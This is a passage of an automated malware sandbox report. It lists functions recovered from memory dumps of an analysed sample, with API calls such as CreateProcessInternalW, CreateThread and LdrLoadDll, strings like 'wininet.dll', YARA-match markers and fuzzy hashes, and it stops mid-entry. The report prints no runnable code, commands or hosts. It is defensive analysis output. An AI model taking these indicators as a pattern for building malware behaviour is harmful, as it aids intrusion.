                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
                                                    • Instruction ID: 4eb25103c60e4f6ce8f03cd2fe8ba932e9d122d31648f0815a42afed0ab7257d
                                                    • Opcode Fuzzy Hash: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
                                                    • Instruction Fuzzy Hash: CB90027220105413F21161594504707040DD7D0285FD1C866A0415559D9696E962B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 148045f9a12e4d66be6db46f36fb138837454c9d07cca08103ca7ca6d7667147
                                                    • Instruction ID: 30b1161517db8187cde22b4c71a6f0a2c6770162dc03e37cf0c1711067c91044
                                                    • Opcode Fuzzy Hash: 148045f9a12e4d66be6db46f36fb138837454c9d07cca08103ca7ca6d7667147
                                                    • Instruction Fuzzy Hash: E6900262242091527645B1594404507440AE7E02857D1C466A1405951C8566F866E661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6642935c99e2bc94ba30be921c23638264888a5a330d65613d3c8d9d4e69b765
                                                    • Instruction ID: 5e54396f7144814f222ac6990661e9a59fc7a2d7730a2a9d74281331bb073c2b
                                                    • Opcode Fuzzy Hash: 6642935c99e2bc94ba30be921c23638264888a5a330d65613d3c8d9d4e69b765
                                                    • Instruction Fuzzy Hash: AE9002A234105442F20061594414B060409D7E1345F91C469E1055555D8659EC627166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 832331e43084c859585cbce67e133f893d1c4cd600af0507feffa655a1eb72bc
                                                    • Instruction ID: 7e3193b36c45c4e7313d3f75ec813bb31eae64c537b39d7d4de3704e5bd5864c
                                                    • Opcode Fuzzy Hash: 832331e43084c859585cbce67e133f893d1c4cd600af0507feffa655a1eb72bc
                                                    • Instruction Fuzzy Hash: 3E9002A220205003620571594414616440ED7E0245B91C475E1005591DC565E8A17165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
                                                    • Instruction ID: 2fedbcb97d90651ca2b7cd5dbb6685a74c4b8b133853260e88ce0ac8a4156947
                                                    • Opcode Fuzzy Hash: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
                                                    • Instruction Fuzzy Hash: 489002B220105402F240715944047460409D7D0345F91C465A5055555E8699EDE576A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
                                                    • Instruction ID: a8bd66cb0c326fca2cac010c999814f9e6cf62c0b5e97858b30b650b6666ca9f
                                                    • Opcode Fuzzy Hash: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
                                                    • Instruction Fuzzy Hash: 45900266211050032205A5590704507044AD7D5395391C475F1006551CD661E8716161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
                                                    • Instruction ID: f70d4f711a719384e1a56d746d748b4a85e185275b2d1795fb8abb23f8903206
                                                    • Opcode Fuzzy Hash: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
                                                    • Instruction Fuzzy Hash: 009002722010D802F2106159840474A0409D7D0345F95C865A4415659D86D5E8A17161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
                                                    • Instruction ID: 7809820b4d748bcbf79e03d33d1142efe8ac550b43a6d02a761c8e62251b9189
                                                    • Opcode Fuzzy Hash: e5094981237fb609c754005289c034f8c9c2f03f49e4763cdb99f0711b2703af
                                                    • Instruction Fuzzy Hash: EF90027220105842F20061594404B460409D7E0345F91C46AA0115655D8655E8617561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
                                                    • Instruction ID: 615b8a8342c47465eb7781b76c8f5bdc218ffda24826372951cc019352ff1973
                                                    • Opcode Fuzzy Hash: 3e7495227cc1a0fed14cd49b548cd7e2e29c8a9349e82095ccd08b5478071eb5
                                                    • Instruction Fuzzy Hash: 6F90027220105802F2807159440464A0409D7D1345FD1C469A0016655DCA55EA6977E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
                                                    • Instruction ID: 64be197c74f0823c0fa35e8d8cd17716ae694a09c8557d29eaf97282cc539f18
                                                    • Opcode Fuzzy Hash: d9290c8d6f00380469b05651c399e7d028fb4775abaee0073da879e19ecfbb39
                                                    • Instruction Fuzzy Hash: 1D90027220509842F24071594404A460419D7D0349F91C465A0055695D9665ED65B6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
                                                    • Instruction ID: 47b3e3309cf49f5da4e07aa205e24e10dee13f6268ad02dfcae301c33212f093
                                                    • Opcode Fuzzy Hash: 37e241a4edfc428dfbdfa5736df7ab5fcd0d9ef411ac05a63cbcd6124d783bed
                                                    • Instruction Fuzzy Hash: 8590026221185042F30065694C14B070409D7D0347F91C569A0145555CC955E8716561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
                                                    • Instruction ID: b8a82f632fa56bf72cb7868dab52028a12b6c00b866e88fc85083968371cbf2d
                                                    • Opcode Fuzzy Hash: b094c179ad8b8ad07ac0ea981627af5cbea51dea165c7b52a0aa15a972b043d3
                                                    • Instruction Fuzzy Hash: 9490026A21305002F2807159540860A0409D7D1246FD1D869A0006559CC955E8796361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
                                                    • Instruction ID: 023be3e3441bce2b6c47db4864c94f0b8ccdfc22a3f1e7248344157531fa3f18
                                                    • Opcode Fuzzy Hash: 7fb894f6b820153823d1005da369779d980bb2bbb49ea9d45b9878b8a150f79d
                                                    • Instruction Fuzzy Hash: 0290027231119402F210615984047060409D7D1245F91C865A0815559D86D5E8A17162
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
                                                    • Instruction ID: a83871d2278dfccabf9281bcc1d791c57444d44abaeea8f0d29d57642b5e6f32
                                                    • Opcode Fuzzy Hash: 6ba181e9a7b3d6396aa479816543a8ac31c896b611643782e1d7f64b45ed1762
                                                    • Instruction Fuzzy Hash: 5B90027220105402F200659954086460409D7E0345F91D465A5015556EC6A5E8A17171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02777310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 027773B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: 97ac5c4296dea38e5ec4cca848477421bd94242178af339f258414473574c63e
                                                    • Instruction ID: b13a7640bed7ef86d1bfac8180daa364dc52f0b89dbd13c1b1ede42f18bbe1dd
                                                    • Opcode Fuzzy Hash: 97ac5c4296dea38e5ec4cca848477421bd94242178af339f258414473574c63e
                                                    • Instruction Fuzzy Hash: B6317EB6602604ABDB15DF64C8A4FABB7B9FF88704F00852DFA1A5B240D770A555CBE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277730B, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 027773B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: 3fc789bc60e5f732d471c4254f3d2cabd5e61200caa47800eaafb0ab017e67ec
                                                    • Instruction ID: 8d0723be13cbd4e5952eb60c213e0610360b6464330d2b2a1fff3da10ffbba37
                                                    • Opcode Fuzzy Hash: 3fc789bc60e5f732d471c4254f3d2cabd5e61200caa47800eaafb0ab017e67ec
                                                    • Instruction Fuzzy Hash: B821B1B1A01200ABDB15DF64C8A4FABBBB5FF48704F04812DFA1D6B241D770A555CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027788F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02763B93), ref: 0277892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 0e05f82afda62833b6e2a9e3195558413027f4a0b09dc518a559e1c37d6a21b0
                                                    • Instruction ID: df4eb4084a34c38cd149da0c426361e34368e260dc2a58b22ac15d39b4076610
                                                    • Opcode Fuzzy Hash: 0e05f82afda62833b6e2a9e3195558413027f4a0b09dc518a559e1c37d6a21b0
                                                    • Instruction Fuzzy Hash: F5F0BEB82082849BDF00EF68DCC48AB77A6BF85218710895AEC5987242D230D5298AA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02778900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02763B93), ref: 0277892D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction ID: b62b2e053b018c42b55ba077fd1e7ef77850cb1caa48e1dcedcd6f5c5d4d2c48
                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                    • Instruction Fuzzy Hash: 77E046B1200208ABDB18EF99CC88EA777ADEF88750F018558FE085B242D630F910CAF0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02767290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027672EA
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0276730B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                    • Instruction ID: 5364d4276173fff5d62d206c255be1f6723f1e0badeb432fc6aedf0a9bef5425
                                                    • Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
                                                    • Instruction Fuzzy Hash: A201A731A80228BAFB22A6959C06FBE776C9B00B55F140114FF04BA1C0E6E4690647F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02769B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02769BC2
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction ID: a139729efbb8c087cd41f49fada691235e44c46d551f3e7efcca7cea4d0efff4
                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                    • Instruction Fuzzy Hash: A4011EB5D0020EABDF10EAA4DC45FEDB7B99B54308F0041A5EE08AB240F671EB54CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02778970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027789C4
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction ID: c8b7c37445c6b8447936af19a767edc0d775504e8cf0e1f283e6c7b9369f8d01
                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction Fuzzy Hash: D701AFB2211108ABCB54DF89DC84EEB77AEAF8C754F158258BA0D97241D630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02777440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0276CD00,?,?), ref: 0277747C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                    • Instruction ID: a3d5dcfd3aa023d27479f07434c48a4c7b52664d2a5664b62f1f048b7dd67625
                                                    • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                                    • Instruction Fuzzy Hash: 01E092333803143AE731659D9C02FA7B39CDB81B24F14003AFA0DEB2C0D595F80146A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02777433, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0276CD00,?,?), ref: 0277747C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: a2c5fc05f77908fea2a82eaa2c1e9958a10f31720c3122e6b87bc566828049bd
                                                    • Instruction ID: 10bc0d4f53ccc6ddb37766c32ec3a0a100f47fb3136cfaf5639881a39beca501
                                                    • Opcode Fuzzy Hash: a2c5fc05f77908fea2a82eaa2c1e9958a10f31720c3122e6b87bc566828049bd
                                                    • Instruction Fuzzy Hash: E4F02B327803003EE6316A9C8C02FB777D9DBA1B10F140529F64DEB2C0C690F8054754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02778A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0276CFD2,0276CFD2,?,00000000,?,?), ref: 02778A90
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction ID: 07f78a2c14ab115860a7fca8ecee5c0460718fcfb5d99dd9422362567000ce71
                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction Fuzzy Hash: 5DE01AB1200208ABDB10DF49CC84EE737ADAF88650F018154BE0857241D930E8108BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027788C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(02773546,?,02773CBF,02773CBF,?,02773546,?,?,?,?,?,00000000,00000000,?), ref: 027788ED
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                    • Instruction ID: 2522285ca25c160f28371c957c12605c810f202d42b7563c0d5326d244c06281
                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                    • Instruction Fuzzy Hash: 07E012B1201208ABDB14EF99CC84EA777ADAF88650F118558BE085B242C630F910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0276D437, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02767C93,?), ref: 0276D46B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                                    • Instruction ID: 5511a24f4c54aff5420223db48dfe8148004e1e209e1280ae972b50b8906f64b
                                                    • Opcode Fuzzy Hash: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                                    • Instruction Fuzzy Hash: 3CE0C2717402047EEB20EFB88C06FAA37D69B94614F0940A4F88EE73C3EE60E401C611
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0276D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02767C93,?), ref: 0276D46B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction ID: c252d5b756359b19acaa2a6c0516597d814898172613e3174d4e56f2c89510b6
                                                    • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                    • Instruction Fuzzy Hash: 3CD0A7717503087BEA10FAE89C07F2632CD5B44B04F494064FD49E73C3DA50F4004561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                                                    • Instruction ID: 19a7c12f2018f14f601814bec95284a66011731a66ca95b090792b4ac396b921
